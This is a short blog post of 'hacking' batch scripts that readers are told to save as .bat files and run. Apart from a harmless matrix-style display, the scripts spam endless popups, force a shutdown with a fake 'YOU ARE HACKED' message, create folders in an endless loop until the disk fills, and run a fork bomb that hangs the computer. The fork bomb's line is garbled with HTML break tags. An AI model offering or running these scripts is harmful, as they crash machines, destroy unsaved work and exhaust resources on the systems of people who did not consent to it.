Saturday 10 January 2015

HB Blog 52: Batch Scripting Coding Hacks!!!

In DOS, OS/2, and Windows, a batch file is a type of script file, a text file containing a series of commands to be executed by the command line interpreter. Now just open your notepad, copy the below sample codes and save notepad file with .bat extension, just don't forget to click them. Enjoy!!!

1)Matrix Effect :-
1
2
3
4
5
@echo off
 color 02
:start
echo %random% %random% %random% %random% HACKING begins %random% %random% %random% %random% %random% %random%
goto start 

2)Unstoppable Popups :-
1
2
3
4
@echo off
:BEGIN
msg * HACKING begins
goto BEGIN

3)Shutdown PC :-
1
2
3
4
@echo off
cls
msg * You Are Hacked
shutdown -s -c "ERROR! YOU ARE HACKED"

4)Infinite Folders :-
1
2
3
4
@echo off
:top
md %random%
goto top

5)Pc Hanger :-
1
:s<br />start %0<br />%0|%0<br />goto :s<br />

No comments:

Post a Comment